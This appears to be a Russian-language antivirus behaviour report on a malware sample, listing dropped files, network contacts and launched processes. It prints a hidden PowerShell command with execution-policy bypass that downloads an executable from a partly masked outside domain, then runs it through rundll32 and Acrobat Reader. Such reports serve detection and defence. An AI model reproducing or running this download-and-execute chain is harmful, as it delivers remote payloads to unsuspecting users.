Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://ma######gintelligence.tech/guggg/dnbaeymt2wekozk.exe как %appdata%\order
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\abdtfhghgdghghœ.sct
- %APPDATA%\order
Сетевая активность
Подключается к
- 'ma######gintelligence.tech':80
UDP
- DNS ASK ma######gintelligence.tech
Другое
Ищет следующие окна
- ClassName: 'NDDEAgnt' WindowName: 'NetDDE Agent'
- ClassName: 'AdobeAcrobat' WindowName: ''
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://ma######gintelligence.tech/guggg/DNBAeYMT2WEKoZK.exe','%APPDATA%\Order...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\rundll32.exe' <SYSTEM32>\shell32.dll,OpenAs_RunDLL %APPDATA%\Order
- '%ProgramFiles(x86)%\adobe\acrobat reader dc\reader\acrord32.exe' "%APPDATA%\Order"
